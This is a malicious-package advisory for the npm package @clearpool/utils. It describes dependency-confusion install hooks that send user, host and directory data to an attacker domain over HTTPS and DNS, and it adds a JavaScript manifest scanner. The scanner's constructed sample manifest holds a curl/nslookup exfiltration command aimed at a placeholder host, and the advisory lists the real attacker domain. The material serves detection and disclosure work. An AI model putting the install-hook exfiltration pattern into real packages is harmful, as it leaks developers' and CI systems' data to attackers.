MAL-2026-3059

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@clearpool/utils/MAL-2026-3059.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3059
Published
2026-04-26T17:25:37Z
Modified
2026-05-13T20:22:38.436168Z
Summary
Malicious code in @clearpool/utils (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (81591bb660ad3ae2036615d00a3ff6960ccd2f36789a4f0df65a53ea7a557336)

package.json declares preinstall and install lifecycle hooks that collect installer-identifying data (whoami, hostname, pwd, $npm_package_name), base64-encode it, and transmit it to attacker-controlled infrastructure at *.callback.m0chan.co.uk via two independent channels: an HTTPS GET with the encoded payload in the URL path, and a DNS lookup embedding the encoded package name as a subdomain label (DNS-tunnel exfiltration to bypass HTTP egress filters). The package uses the @clearpool scope with version 99.99.99 and empty author metadata — classic dependency-confusion markers aimed at hijacking resolution of an internal package name within organizations that use this scope privately. Any developer or CI system running npm install with this package resolved will leak user, host, working directory, and the requested internal package name to the attacker, providing reconnaissance for follow-on targeted attacks.

Source: ossf-package-analysis (402b776bfcc2da45256da8475f7acaa61c2c1f9679e09f0409523062ffe3d823)

The OpenSSF Package Analysis project identified '@clearpool/utils' @ 99.99.99 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
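
The install-hook reconnaissance, the two exfiltration channels and the dependency-confusion markers described in the amazon-inspector details above, turned into manifest-level detection heuristics as an added example that is not part of the advisory or of the package it describes. The two manifests inside the block are constructed imitations: the hostnames are non-routable placeholders (example.invalid) rather than the advisory's indicators, the hypothetical benign manifest stands in for an internal package of the same name, and the "major version 99 or above" threshold is an assumption of this example.

```javascript
// Added example (not the advisory's or the package's code). Both manifests below are
// constructed; hostnames are non-routable placeholders, not the real indicators.
const HOOKS = ['preinstall', 'install', 'postinstall'];
const RECON = ['whoami', 'hostname', 'pwd', '$npm_package_name'];
const ENCODE = ['base64', 'btoa', 'Buffer.from'];
const HTTP_EGRESS = /\b(curl|wget)\b|https?:\/\//;
const DNS_EGRESS = /\b(nslookup|dig|host|dns\.(lookup|resolve))\b/;
// A shell variable used as a DNS label, the advisory's "$pkgsub.callback." shape.
const VAR_IN_HOSTNAME = /\$\{?[A-Za-z_]\w*\}?\.[A-Za-z0-9-]+\./;

function auditManifest(text) {
  const pkg = JSON.parse(text);
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    findings.push(`${hook}: lifecycle hook runs code during npm install`);
    if (RECON.some((t) => cmd.includes(t))) findings.push(`${hook}: collects user/host/cwd/package name`);
    if (ENCODE.some((t) => cmd.includes(t))) findings.push(`${hook}: encodes collected data`);
    if (HTTP_EGRESS.test(cmd)) findings.push(`${hook}: HTTP egress`);
    if (DNS_EGRESS.test(cmd)) findings.push(`${hook}: DNS lookup (possible DNS-tunnel exfiltration)`);
    if (VAR_IN_HOSTNAME.test(cmd)) findings.push(`${hook}: variable spliced into a hostname`);
  }
  // Dependency-confusion markers: implausibly high version (assumed threshold 99), scoped name, empty author.
  const major = Number(String(pkg.version || '0').split('.')[0]);
  if (major >= 99) {
    const markers = [`implausible version ${pkg.version}`];
    if (typeof pkg.name === 'string' && pkg.name.startsWith('@')) markers.push('scoped name');
    if (!pkg.author) markers.push('empty author');
    findings.push(`dependency-confusion markers: ${markers.join(', ')}`);
  }
  const exfil = findings.some((f) => / egress| DNS lookup/.test(f));
  const recon = findings.some((f) => /: collects /.test(f));
  const verdict = exfil && recon ? 'malicious' : findings.length ? 'suspicious' : 'clean';
  return { verdict, findings };
}

// Constructed imitation of the described manifest (placeholder host, not the real indicator).
const SUSPICIOUS = JSON.stringify({
  name: '@clearpool/utils', version: '99.99.99', author: '',
  scripts: { preinstall: 'whoami; hostname; pwd; echo $npm_package_name | base64',
             install: 'curl -s https://$pkgsub.callback.example.invalid/$b64; nslookup $pkgsub.callback.example.invalid' },
});
// Hypothetical legitimate manifest for the internal package such a hijack targets.
const BENIGN = JSON.stringify({ name: '@clearpool/utils', version: '1.4.2', author: 'Example Maintainer',
  scripts: { build: 'tsc -p .', test: 'node --test' } });

console.log(auditManifest(SUSPICIOUS).verdict, auditManifest(BENIGN).verdict); // malicious clean
```

Run it against the extracted package.json of a suspect tarball to get the hook-by-hook findings; a registry-wide check would also compare the scoped name against the organisation's private registry.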
Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-04-27T01:40:41.886648731Z",
            "sha256": "b432a00368de0df939eba45db1d503e6e8c7540f17924d524a534026d2487ea8",
            "source": "ossf-package-analysis",
            "modified_time": "2026-04-26T17:25:37Z",
            "versions": [
                "9.9.9"
            ]
        },
        {
            "import_time": "2026-04-30T22:23:09.292226445Z",
            "sha256": "aaf42d3e0422cdf2bd133cbfe2bad48be71bff1682908c0b740817555a83d4a9",
            "source": "amazon-inspector",
            "modified_time": "2026-04-30T21:59:18Z",
            "versions": [
                "9.9.9"
            ]
        },
        {
            "import_time": "2026-05-04T03:13:23.513134014Z",
            "sha256": "402b776bfcc2da45256da8475f7acaa61c2c1f9679e09f0409523062ffe3d823",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-03T12:37:45Z",
            "versions": [
                "99.99.99"
            ]
        },
        {
            "import_time": "2026-05-04T23:49:24.952171956Z",
            "sha256": "d7ef40ea20810d9e89d3d3998c64d7c1acf6dfdf5f9aafa8765a0c2ec4cfbe54",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-04T13:20:40Z",
            "versions": [
                "100.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-002401",
            "sha256": "81591bb660ad3ae2036615d00a3ff6960ccd2f36789a4f0df65a53ea7a557336",
            "import_time": "2026-05-13T20:10:56.665534762Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-12T19:03:07Z",
            "versions": [
                "99.99.99"
            ]
        }
    ]
}

Affected packages

npm / @clearpool/utils

Package

Name
@clearpool/utils
Purl
pkg:npm/%40clearpool/utils

Affected versions

  • 9.*: 9.9.9
  • 99.*: 99.99.99
  • 100.*: 100.0.0

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "utils-99.99.99.tgz",
            "hashes": {
                "sha512_sri": "sha512-mc9tFj/bZmwxRws5+RiRNuo4xWn+ZEdxddqpOXtgDwRGGCLAzYaCeG65OrIk/Pd/sFE2MxiEeQYpX5GjgeOeXw==",
                "sha1": "a27ed0001e09a22295b08c0f1d0f27b54fa4fe44"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "5f15d70e40687a733596bf143629b360ebdecaf16cef12052a92c7df34d4ea3a",
            "tlsh": "39115c601031de3139e04f781d00a72d75bc6baf323e7f45a20e5a2f001d165766f61a",
            "path": "package.json"
        }
    ],
    "domains": [
        "$pkgsub.callback.m0chan.co.uk"
    ],
    "urls": [
        "https://$pkgsub.callback.m0chan.co.uk/$b64"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@clearpool/utils/MAL-2026-3059.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]